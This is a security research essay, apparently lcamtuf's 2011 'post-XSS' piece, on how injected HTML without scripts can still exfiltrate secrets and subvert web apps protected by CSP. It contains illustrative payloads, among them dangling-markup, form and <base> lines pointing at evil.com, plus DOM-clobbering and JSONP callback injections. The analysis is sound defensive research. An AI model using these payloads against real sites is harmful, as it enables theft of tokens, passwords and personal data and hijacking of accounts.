One of the most rudimentary goals of a successful XSS attack is the extraction of user-specific secrets from the vulnerable application. Historically, XSS exploits sought to obtain HTTP cookies associated with the authenticated user session; these tokens - a form of ambient authority - could be later replayed by the attacker to remotely impersonate the victim within the targeted site. The introduction of httponly cookies greatly limited this possibility - and prompted rogue parties to pursue finer-grained approaches.

In an application where theft of HTTP cookies is not practical, exfiltration attempts are usually geared toward the extraction of any of the following:

- Personal data. In applications such as webmail systems, discussion or messaging platforms, social networks, or shopping or banking sites, the information about the user may be of immense value on its own merit. The extraction of contact lists, messaging history, or transaction records may be the ultimate goal of an attack.

- Tokens used to defend against cross-site request forgery attacks. Under normal circumstances, any website loaded in the victim's browser is free to blindly initiate cross-domain requests to any destination.
Because such a request is automatically supplemented with the user's ambient credentials, it is difficult to distinguish it from a request that arises in response to a legitimate user action. To prevent malicious interference, most websites append session-specific, unpredictable secrets - XSRF tokens - to all GET URLs or POST request bodies that change the state of the user account or perform other disruptive tasks.

The tokens are an attractive target for exfiltration, because their possession enables the attacker to bypass the defense, and construct valid-looking state-changing requests that can be relayed through the victim's browser later on. Such requests may, for example, instruct the application to add an attacker-controlled persona as a privileged contact or a delegate for the victim.

- Capability-bearing URLs. Many modern web applications make occasional use of capability-bearing URLs; this is particularly common for constructing invitation and sharing links; offering downloads of private data; implementing single sign-on (SSO) flows; or performing federated login. The ability for the attacker to obtain these URLs is equivalent to gaining access to the protected resource or functionality; especially in the case of authentication flows, that token may be equivalent to HTTP cookies.

In this section, I'd like to present several exfiltration strategies that enable attackers to extract these types of data without the need to execute JavaScript.

2.1. Dangling markup injection

Perhaps the least complicated extraction technique employs the injection of non-terminated markup. This action prompts the receiving parser to consume a significant portion of the subsequent HTML syntax, until the expected terminating sequence is encountered.

To illustrate this attack, consider the following example of a markup injection vector:

  <img src='http://evil.com/log.cgi?     ← Injected line with a non-terminated parameter
  ...
  <input type="hidden" name="xsrf_token" value="12345">
  ...
  '                                      ← Normally-occurring apostrophe in page text
  ...
  </div>                                 ← Any normally-occurring tag (to provide a closing bracket)

Any markup between the opening single quote of the src parameter and the next occurrence of a matching quote will be treated as a part of the image URL. Consequently, the browser will issue a request to retrieve the image from the specified location - thereby disclosing the secret value to an attacker-controlled destination:

  http://evil.com/log.cgi?...<input type="hidden" name="xsrf_token" value="12345">...

Note that in some deployments of CSP, the destination URLs for <img> tags may be restricted for non-security reasons; in these cases, the attacker is free to leverage several other tags, including <meta http-equiv="Refresh" ...> - honored anywhere in the document in all popular browsers, and not subject to policy controls.

In either case, the attacker may choose the parameter quoting scheme to counter the prevalent syntax used on the targeted page; single and double quotes are recognized by all browsers, and in Internet Explorer, backtick (`) is also a recognized option. In most browsers, the HTML parser must encounter a matching quote and a greater-than character before the end of the document; otherwise, the malformed tag will be ignored. This is not true for all HTML parsers, however: Opera and older versions of Firefox will close the tag implicitly.

To succeed, the attack also requires the injection point to appear before the secret to be extracted. If governed by pure chance, this condition will be met in 50% of all cases. In practice, the odds will often be higher: it is not uncommon for a vulnerable website to embed several copies of the same secret, or several instances of an improperly escaped parameter, on a single page.

2.2. <textarea>-based consumption

The dangling markup vector discussed in section 2.1 is to some extent dependent on the layout of the vulnerable page; in absence of a matching quote character, or in presence of mixed-style quoting in the legitimately present markup, the attack may be difficult to carry out. These constraints are removed by leveraging the CDATA-like behavior of the <textarea> tag, however.

The possibility is illustrated by the following snippet:

  <form action='http://evil.com/log.cgi'><textarea>   ← Injected line
  ...
  <input type="hidden" name="xsrf_token" value="12345">
  ...
  (EOF)

In this case, all browsers will implicitly close the <textarea> and <form> blocks.

The weakness of this approach is that, in contrast to the previous method, a degree of user interaction is needed to exfiltrate the data: the victim must submit the form by pressing ENTER or clicking the submit button. This interaction is easy to facilitate by giving the submit button a misleading appearance - for example, as a faux notification or an interstitial to be dismissed, or even a transparent overlay that spans the entire browser window. That goal can typically be achieved by leveraging existing CSS classes in the application, or other methods discussed later in this document (section 3.3).

It is also worth noting that forms with auto-submit capabilities are being considered for HTML5; such a feature may unintentionally assist with the automation of this attack in future browsers.

Attribution: The idea for <textarea>-based markup consumption comes from an upcoming paper on data exfiltration by Eric Y. Chen, Sergey Gorbaty, Astha Singhal, and Collin Jackson. According to Gareth Heyes, it might have been discussed previously, too. Gareth additionally points out similar consumption vectors via <button> and <option>.

2.3. Rerouting of existing forms

Another exfiltration opportunity is afforded by a peculiar property of HTML: the <form> tag can't be nested, and the top-level occurrence of this markup always takes precedence over subsequent appearances. This allows the attacker to change the URL to which any existing form will be submitted, simply by injecting an additional form definition in the preceding portion of the document:

  <form action='http://evil.com/log.cgi'>   ← Injected line
  ...
  <form action='update_profile.php'>        ← Legitimate, pre-existing form
  ...
  <input type="text" name="real_name" value="John Q. Public">
  ...
  </form>

This attack is particularly interesting when used to target forms automatically populated with user-specific secrets - as would be the case with any forms used to update profile information, shipping or billing address, or other contact data; form-based XSRF tokens are also a possible target.

2.4. Use of <base> to hijack relative URLs

The next exfiltration vector worth highlighting relies on the injection of <base> tags. A majority of web browsers honor this tag outside the standards-mandated <head> section; in such a case, the attacker injecting this markup would be able to change the semantics of all subsequently appearing relative URLs, e.g.:

  <base href='http://evil.com/'>            ← Injected line
  ...
  <form action='update_profile.php'>        ← Legitimate, pre-existing form
  ...
  <input type="text" name="real_name" value="John Q. Public">
  ...
  </form>

Here, any user-initiated profile update will be submitted to http://evil.com/update_profile.php, rather than back to the originating server that produced the HTML document.

2.5. Form injection to intercept browser-managed passwords

In-browser password managers are a popular tool for simplifying account management across multiple websites. They operate by detecting HTML forms that include a password field, and offering to save the entered credentials in a browser-operated password jar.
The stored passwords are then automatically inserted into any plausible-looking forms encountered within a matching origin. In Chrome and Firefox, this autocompletion requires no user interaction; in Internet Explorer and Opera, an additional gesture may be required.

The attacker may obtain stored passwords by leveraging a markup injection vulnerability to present the browser with a well-structured password form. In absence of the ability to execute scripts, the next step is browser- and application-specific:

- In browsers such as Chrome and Opera, the actual URL to which the form submits (the action parameter) may be selected arbitrarily and may point to an attacker-controlled server. This offers a very straightforward exfiltration opportunity.

- In most other browsers, it is possible to present a form that specifies GET instead of POST as the submission mode (the method parameter), and submit the credentials to a carefully selected same-site destination. That destination may be a page that links to or includes subresources from third-party sites (thus leaking the credentials in the Referer header); or a page that echoes back query parameters in the response body, and is vulnerable to any of the previously discussed exfiltration methods.

2.6. Addendum: The limits of exfiltration defenses

It is tempting to counter the vectors previously outlined in the document by simply preventing the attacker from contacting third-party servers; for example, one may wish to restrict the set of permissible destinations for markup such as <form>, <a href=...>, or <img>. Indeed, several academic anti-exfiltration frameworks have been proposed in the past, either as a sole defense against the consequences of cross-site scripting, or to be used in tandem with script execution countermeasures.
It appears that some desire to prevent exfiltration influenced the original proposals for CSP, too.

It must be noted, however, that any attempts to prevent exfiltration, even in script-less environments, are very unlikely to be successful. Browsers offer extensive indirect data disclosure opportunities through channels such as the Referer technique outlined in 2.5; through the window.name parameter that persists across origins (and policy scopes) on newly created views; and through a variety of DOM inspection and renderer and cache timing vectors that may be used by third-party documents to make surprisingly fine-grained observations about the structure of the policed page.

It is also important to recognize that exfiltration attempts do not have to be geared toward relaying the data to a third-party website to begin with: in many settings, it is sufficient to move the data from private into public view, all within the scope of a single website. A simple illustration of this attack on an e-commerce site may be:

  <form action='/post_review.php'>
  <input type='hidden' name='review_body' value="        ← Injected lines
  ...
  Your current shipping address:                         ← Existing page text to be exfiltrated
  123 Evergreen Terrace
  Springfield, USA
  ...
  <form action="/update_address.php">                    ← Existing form (ignored by the parser)
  ...
  <input type="hidden" name="xsrf_token" value="12345">  ← Token valid for /update_address.php and /post_review.php
  ...
  </form>

This form, if interacted with, will unexpectedly submit the victim's home address as the body of a publicly visible product review, where the attacker may be able to intercept it before the user notices the problem and reacts.

Attribution: The second technique presented above is inspired by an upcoming paper on data exfiltration by Eric Y. Chen, Sergey Gorbaty, Astha Singhal, and Collin Jackson.

3. Infiltration of application logic

Data exfiltration is one of the important goals in the exploitation of XSS vulnerabilities, but is not the only one.
In some settings, the attacker may be more interested in actively disrupting the state of the targeted application; these attacks typically seek one or more of the following outcomes:

- Alteration or destruction of legitimate content. Most attackers will seek to immediately replace victim-owned documents with misleading or disparaging content, to distribute offensive messages, or to simply destroy valuable data.

- Delegation of account access. Such attacks seek to gain longer-term access to the capabilities offered by the targeted site - such as read-only or read-write access to the victim's private data. On a content publishing platform, this may involve adding an attacker-controlled persona as a secondary administrator of the victim-owned channel, or as a collaborator on a particular document; in a webmail system, the attack may focus on creating a mail forwarding rule to siphon off all the incoming mail; and on a social networking site, the goal may be to add the attacker as a trusted contact ("friend").

- Use of special privileges. In select cases, attackers may wish to abuse additional privileges bestowed upon the vulnerable origin by the browser itself (e.g., the ability to change critical settings, install extensions or updates); or the trust the user associates with the targeted site (perhaps expressed as the willingness to accept unsolicited downloads).

- Propagation of attacker-supplied markup. Certain attacks seek to create autonomously propagating worms that spread between the users of a site by leveraging site-specific messaging and content sharing mechanisms. The creation of a worm may be an accomplishment in itself, or a way of maximizing the efficiency of any other attack.

This section showcases techniques that may be used to further these goals in absence of the ability to inject attacker-supplied code.

3.1. Interference with existing scripts

Contemporary web applications make extensive use of JavaScript to handle the bulk of content presentation and user interface tasks. From the security standpoint, these responsibilities may have seemed insignificant, but this view no longer holds true; for example, in a collaborative document editor, client-side scripts may be tasked with:

- Determining and recording the outcome of user-initiated ACL changes for the document ("sharing dialogs"),
- Sanitizing or escaping server-supplied strings to make them safe for display,
- Keeping track of and synchronizing the contents of the edited file.

By analogy to conceptually similar but better-studied race condition or off-by-one vulnerabilities in non-browser applications, it can be expected that the ability to put the execution environment in an inconsistent and unexpected state will not merely render the program inoperative - but will routinely lead to outcomes desirable to the attacker.

3.1.1. HTML namespace attacks

One of the most straightforward state corruption vectors is based on id or name collisions between attacker-injected markup and legitimate contents of the page. The impact of such a collision is easy to illustrate using the example of a script-generated dialog, where the initial state of a configurable setting is captured using an editable control (typically <input>), and then read back through document.getElementById(...) and sent to the server:

  <input type='checkbox' id='is_public' checked>    ← Injected markup
  ...
  // Legitimate application code follows

  function render_acl_dialog() {
    ...
    if (shared_publicly)
      dialog.innerHTML += '<input type="checkbox" id="is_public" checked>';
    else
      dialog.innerHTML += '<input type="checkbox" id="is_public">';
    ...
  }

  function acl_dialog_done() {
    ...
    if (document.getElementById('is_public').checked)   ← Condition true regardless of user choice
      request.access_mode = AM_PUBLIC;
    ...
  }

An even simpler example against a statically constructed dialog may be carried out as follows:

  <input type='hidden' id='share_with' value='fredmbogo'>   ← Injected markup
  ...
  Share this status update with:                            ← Legitimate optional element of a dialog
  <input id='share_with' value=''>
  ...
  function submit_status_update() {
    ...
    request.share_with = document.getElementById('share_with').value;
    ...
  }

In both cases, the browser will allow the page to have several DOM elements with the same id parameter, but only the first, attacker-controlled value will be returned on getElementById(...) lookups. The initial state of the configurable setting will be stored in one tag, but the attempt to read back the value later on will interact with another.

The degree of user interaction required for this attack to succeed is application-specific, and may vary from zero to multiple clicks. The article proposes a method for making the user unwittingly interact with UI controls in section 3.3.

3.1.2. Script namespace attacks

The namespace attack discussed in the previous section may also be leveraged to directly interfere with the JavaScript execution environment, without relying on other HTML elements as a proxy. This is because of a little-known link between the markup and the script namespace: in all popular browsers, the identifiers attached to HTML tags are automatically registered in the JavaScript context associated with the page. This registration happens on two levels:

- For any type of tag, a new node with a name matching the id parameter of the tag is inserted into the default object scope. In other words, <div id=test> will create a global variable test (of type HTMLDivElement), pointing to the DOM object associated with the tag. In this scenario, the mapping has a lower priority than any built-ins or variables previously created by on-page scripts. The behavior of identically named variables created later on is browser-specific.
- For several special tags, such as <img>, <iframe>, or <embed>, an entry for both the id and the name is additionally inserted into the document object. For example, <img name=test> will produce a node named document.test. This mapping has a higher priority than built-ins and script-created variables.

An attacker capable of injecting passive markup may leverage this property in a manner illustrated in this code snippet:

  <img id='is_public'>                      ← Injected markup
  ...
  // Legitimate application code follows

  function retrieve_acls() {
    ...
    if (response.access_mode == AM_PUBLIC)  ← The subsequent assignment fails in IE
      is_public = true;
    else
      is_public = false;
  }

  function submit_new_acls() {
    ...
    if (is_public) request.access_mode = AM_PUBLIC;   ← Condition always evaluates to true
    ...
  }

The consequences of this namespace pollution are made worse because the DOM objects associated with certain HTML elements have specialized methods for converting them to strings; this enables the attacker to attack not only simple Boolean conditions, but also to spoof numbers and strings:

  <a id='owner_user' href='fredmbogo'>      ← Injected markup
  <img id='data_loaded'>
  ...
  // Legitimate application code follows

  function retrieve_data() {
    if (window.data_loaded) return;         ← Condition met in browsers other than Firefox
    ...
    owner_user = response.owner;
    data_loaded = true;
  }

  function submit_new_acls() {
    ...
    request.can_edit = owner_user + ...;    ← The string 'fredmbogo' is inserted
    request.can_read = owner_user + ...;
    ...
  }

Several other exploitation venues appear to exist, but will be more closely tied to the design of the targeted application.
It is, for example, possible to shadow built-ins such as document.domain, document.cookie, document.location, or document.referrer in order to interfere with certain security decisions; it is also trivial to disrupt the operation of methods such as document.createElement() or document.open(); fabricate the availability of the window.postMessage(...), window.crypto, or other security APIs; and more.

3.1.3. Script load order issues (CSP-specific)

Script policing frameworks must necessarily seek a compromise between the ease of deployment and the granularity of the offered security controls. In the case of Content Security Policy, this compromise may unexpectedly undermine the assurances offered to many real-world web apps.

The key issue is that, for the sake of simplicity, CSP relies on origin-level granularity: it is possible to control permissible script sources on a protocol, host, and port level, but not to specify individual script URLs - or the order they need to be loaded in. This design decision enables the attacker to load arbitrary scripts found anywhere on the site in an unexpected context, in an incorrect order, or an unplanned number of times.

One trivial but plausible example where this capability may be used to put the application in an inconsistent state is illustrated below:

  <script src='initialize.js'></script>:        ← Legitimate scripts
    var edited_text = '';

  <script src='load_document.js'></script>:
    edited_text = server_response.text;
    ...
    setInterval(autosave_to_server, 10000);

  <script src='initialize.js'></script>:        ← Injected script load
    var edited_text = '';

The possibility of loading scripts that use similar variable or function names, but belong to logically separate views, is perhaps more unsettling and more difficult to audit for; consider the following snippet of code:

  <script src='/admin/initialize.js'></script>: ← Injected script load
    ...
    initialized = true;

  <script src='/editor/editor.js'></script>:    ← Legitimate scripts
    ...
    function load_data() {
      if (initialized) return;
      ...
      if (new_document) {
        acl_read_users = current_username;
        acl_write_users = current_username;
        ...
      }
      ...
      initialized = true;
    }
    ...
    function save_acls() {
      ...
      request.acl_read_users = acl_read_users;  ← Submits user 'undefined' as a collaborator
      request.acl_write_users = acl_write_users;
      ...
    }

On any moderately complex website, it appears to be prohibitively difficult to account for all the possible interactions between hundreds of unrelated scripts. Further, it appears unlikely that webmasters would routinely appreciate the consequences of hosting nominally unused portions of JavaScript libraries, older versions of currently loaded scripts, or portions of JS used for testing or diagnostic purposes, anywhere within their WWW root.

3.1.4. Abuse of JSONP (CSP-specific)

JSONP (JSON with padding) is a popular method for building JavaScript APIs. JSONP interfaces are frequently used to integrate with services provided by trusted third-party sites (e.g., to implement search or mapping capabilities), as well as to retrieve private first-party data (in this case, an additional Referer check or an XSRF token is commonly used).

Regardless of the purpose, the integration with any JSONP API is achieved by including a script reference similar to this:

  <script src="http://example.com/find_store.php?zipcode=90210&callback=parse_response"></script>

In response, the server dynamically generates a script structured roughly the following way:

  parse_response({ 'zipcode': '90210', 'results': [ '123 Evergreen Terrace', ... ] });

The inclusion of this response as a script results in the invocation of a client-specified callback - parse_response(...) - in the context of the calling page.

Any CSP-enabled website that either offers JSONP feeds to others, or utilizes them internally, is automatically prone to a flavor of return-oriented programming: the attacker is able to invoke any functions of his choice, often with at least partly controllable parameters, by specifying them as the callback parameter on the API call:

  <script src='/editor/sharing.js'>:            ← Legitimate script
    function set_sharing(public) {
      if (public) request.access_mode = AM_PUBLIC;
      else request.access_mode = AM_PRIVATE;
      ...
    }

  <script src='/search?q=a&call=set_sharing'>:  ← Injected JSONP call
    set_sharing({ ... })

In addition, any JSONP interface that does not filter out parentheses or other syntax elements in the name of the callback function - a practice that has no special security consequences under normal operating conditions - will be vulnerable to an even more straightforward attack:

  <script src='/search?q=a&call=alert(1)'></script>

3.1.5. Selective removal of scripts (specific to XSS filters)

The last script-related vector that deserves a brief mention in this document is associated with the use of reflected cross-site scripting filters. XSS filters are a security feature designed to selectively remove suspected XSS exploitation attempts from the rendered HTML. They do so by looking for scripting-capable markup that appears to correspond to a potentially attacker-controlled parameter present in the underlying HTTP request.
For example, if a request for /search?q=<script>alert(1)</script> returns a page containing <script>alert(1)</script> in its markup, that snippet of HTML will be removed by the filter to stop possible exploitation of an XSS flaw.

Because of the fully passive design of the detection stage, cross-site scripting filters have the unfortunate property of being prone to attacker-triggered false positives: by quoting a snippet of a legitimate script present on the page, the XSS filter may be duped into removing this block of code, while permitting any remaining <script> segments or inline event handlers to execute. This behavior has the potential to place the targeted application in an inconsistent state, which may be exploitable in a manner similar to the attacks outlined in section 3.1.3.

3.2. Form parameter injection

The JavaScript-centric exploitation strategies discussed previously are an attractive target for attackers, but even in absence of complex scripts, markup injection may be leveraged to alter the state of the application. The disruption of HTML forms is one example of a method independent of any client-side JavaScript: by injecting additional <input type='hidden'> fields in the vicinity of an existing state-changing form, the attacker may trivially change the way the server interprets the intent behind the eventual submission, e.g.:

  <form action='/change_settings.php'>                        ← Injected lines
  <input type='hidden' name='invite_user' value='fredmbogo'>

  <form action="/change_settings.php">                        ← Existing form (ignored by the parser)
  ...
  <input type="text" name="invite_user" value="">             ← Subverted field
  ...
  <input type="hidden" name="xsrf_token" value="12345">
  ...
  </form>

A vast majority of web frameworks will only interpret the first occurrence of invite_user in the submitted form, and will add the account of the attacker's choice as a collaborator.

Further, because a significant number of frameworks also use XSRF tokens that are not scoped to individual forms, the attack proposed in section 2.6 may be combined with this approach in order to reuse an existing token and submit data to an unrelated state-changing form:

  <form action='/change_settings.php'>                        ← Injected lines
  <input type='hidden' name='invite_user' value='fredmbogo'>

  <form action="/update_status.php">                          ← Existing form (ignored by the parser)
  ...
  <input type="text" name="message" value="">                 ← Existing field (ignored by /change_settings.php)
  ...
  <input type="hidden" name="xsrf_token" value="12345">
  ...
  </form>

3.3. UI-level attacks

It should be apparent that the ability to inject passive markup is often sufficient to disrupt the underlying logic of the targeted application. The other important and frequently overlooked aspect of the security of any web application is the integrity of its user interface.

In analyzing the impact of markup injection vulnerabilities, we must consider the possibility that the attacker will use stylesheets, perhaps combined with legacy HTML positioning directives, to overlay their own content on top of legitimate UI controls and alter their apparent purpose, without affecting the scripted behaviors associated with user actions.
For example, it may be possible to skin a document sharing dialog as a harmless and friendly notification, without changing the underlying semantics of the "OK" button displayed therein.

Although the most recent specification of CSP disallows inline stylesheets to protect against an unrelated weakness, the attacker is still free to load any other standalone stylesheet found within any of the whitelisted origins, and to reuse any of the offered classes normally used to construct the legitimate UI; therefore, such an attack is very likely to be feasible.

Another area of concern is that the occurrence of a click or other simple UI action is not necessarily indicative of informed consent. The attacker may trick the user into unwittingly interacting with the targeted application by predicting the timing of a premeditated click, and rapidly transitioning between two documents or two simultaneously open windows; this problem is one of the unsolved challenges in browser engineering, and is discussed in more detail on this page. The context-switching attack may be used separately, or may be leveraged in conjunction with any of the exfiltration or state-change techniques discussed here to work around the normally required degree of interaction with the vulnerable page.

3.4. Abuse of special privileges

In addition to the attacks on application logic and the apparent function of UI controls, markup injection vulnerabilities may be leveraged to initiate certain privileged actions in a way that bypasses the normal security restrictions placed on untrusted sites. These attacks are of less interest from the technical perspective, but are of significant practical concern.

Examples of privilege-based attacks that may be delivered over passive HTML markup include:

- Updating OpenSearch registrations associated with the site to subvert the search integration capabilities built into the browser.
- Initiating the download and installation of extensions, themes, or updates (if the compromised origin is recognized as privileged by one of the mechanisms built into the browser).

- Instantiating site-locked plugins or ActiveX extensions with attacker-controlled parameters.

- Starting file downloads or providing misleading and dangerous advice to the user; because users are trained to make trust decisions based on the indicators provided in the address bar, this offers a qualitative difference in comparison to traditional phishing.

4. Practical limitations of XSS defenses

The exfiltration and infiltration methods discussed in this document were chosen for their proximity to the attack outcomes that script containment frameworks hope to prevent, and to the technological domains they operate in. I also shied away from including a detailed discussion of transient and easily correctable glitches in the scope or operation of these mechanisms.

A more holistic assessment of these frameworks must recognize, however, that their application is limited to HTML documents, and even more specifically, to documents that are expected ahead of time to be displayed by the browser as HTML. The existing frameworks have no control over any subresources that may be interpreted by specialized XML parsers or routed to plugins; in that last case, the hosting party has very little control over the process, too.

Another practical consideration is that, despite being designed by security experts, these frameworks interact with various browser features in ways complex enough that they must be constantly revised to account for a number of significant loopholes.
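As an illustration of the kind of loophole involved (the URL below is hypothetical), consider a <script> tag pointed at a whitelisted endpoint that merely echoes user-supplied text, such as a profile field:

```html
<!-- Hypothetical example: the policy whitelists scripts from
     trusted.example only, but /profile/bio echoes attacker-supplied text
     with a non-script Content-Type. Before CSP deployments enforced strict
     MIME type checks on script responses, the echoed bytes could be
     executed as JavaScript in the trusted page. -->
<script src="https://trusted.example/profile/bio?uid=13"></script>
```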
Some of the notable issues in the relatively short life of CSP included the ability to spoof scripts by pointing <script> tags to non-script documents with partly attacker-controlled contents (originally fixed with strict MIME type matching); the ability to use CSS3 complex selectors to exfiltrate data (addressed by disallowing inline stylesheets); and the ability to leverage accessibility features to implement rudimentary keylogging. This list will probably grow.

5. Conclusion

There is no doubt that the recently proposed security measures offer a clear quantitative benefit by rendering the exploitation of markup vulnerabilities more difficult, and dependent on a greater number of application-specific prerequisites.

At the same time, I hope to have demonstrated that web applications protected by frameworks such as CSP are still likely to suffer significant security consequences in case of a markup injection flaw. I believe that in many real-world scenarios, the qualitative difference offered by the aforementioned mechanisms is substantially less than expected.

It may be useful to compare these measures to the approaches used to mitigate the impact of stack buffer overflows: the use of address space layout randomization, non-executable stack segments, and stack canaries has made the exploitation of certain implementation issues more difficult, but reliably prevented it in only a relatively small fraction of cases.

For as long as web documents are routinely produced and exchanged as serialized HTML, markup injection will remain a security threat. To address the problem fully, one may flirt with the idea of replacing serialized HTML with parsed, binary DOM trees that would be exchanged directly between the server and the client, and between portions of client-side JavaScript.
The performance benefits associated with this design would probably encourage client- and server-side frameworks to limit the use of serialized HTML documents in complex web apps.

[Originally published in December 2011]

Source: http://lcamtuf.coredump.cx/postxss/